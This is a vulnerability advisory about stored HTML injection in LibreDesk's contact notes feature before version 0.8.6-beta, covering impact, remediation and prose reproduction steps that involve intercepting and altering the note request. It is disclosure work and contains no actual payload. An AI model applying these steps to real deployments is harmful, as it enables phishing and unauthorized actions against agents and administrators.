LibreDesk Stored HTML Injection Vulnerability in Contact Notes Feature

A stored HTML injection vulnerability has been identified in LibreDesk versions prior to 0.8.6-beta, specifically within the contact notes feature. When notes are added via the API, the backend automatically encloses the user input in paragraph tags. However, an attacker can intercept the request, remove the paragraph tags, and inject arbitrary HTML elements such as forms and images. This injected content is then stored and displayed without adequate sanitization, potentially leading to phishing attacks, unauthorized actions reminiscent of Cross-Site Request Forgery, and user interface manipulation. The vulnerability arises because the application relies on client-side HTML formatting assumptions, which can be easily exploited by modifying the request payload.

Impact

Exploitation of this vulnerability allows for stored HTML injection, with the injected content being rendered in the application. This could lead to credential phishing, Cross-Site Request Forgery-like attacks, user interface manipulation, and social engineering opportunities, especially if the affected notes are viewed by users with administrative or agent privileges.

Reproduction

To reproduce this vulnerability, log into LibreDesk and navigate to any contact. Add a note through the user interface, which will be sent as a POST request to the API with the note content wrapped in paragraph tags. Intercept this request and modify the payload by removing the paragraph tags and injecting arbitrary HTML, such as a form. After forwarding the modified request, the injected HTML will be rendered when the contact note is viewed in the LibreDesk interface.

Remediation

Users can update to LibreDesk version 0.8.6-beta, which addresses this vulnerability by implementing proper HTML sanitization before storing and rendering note content.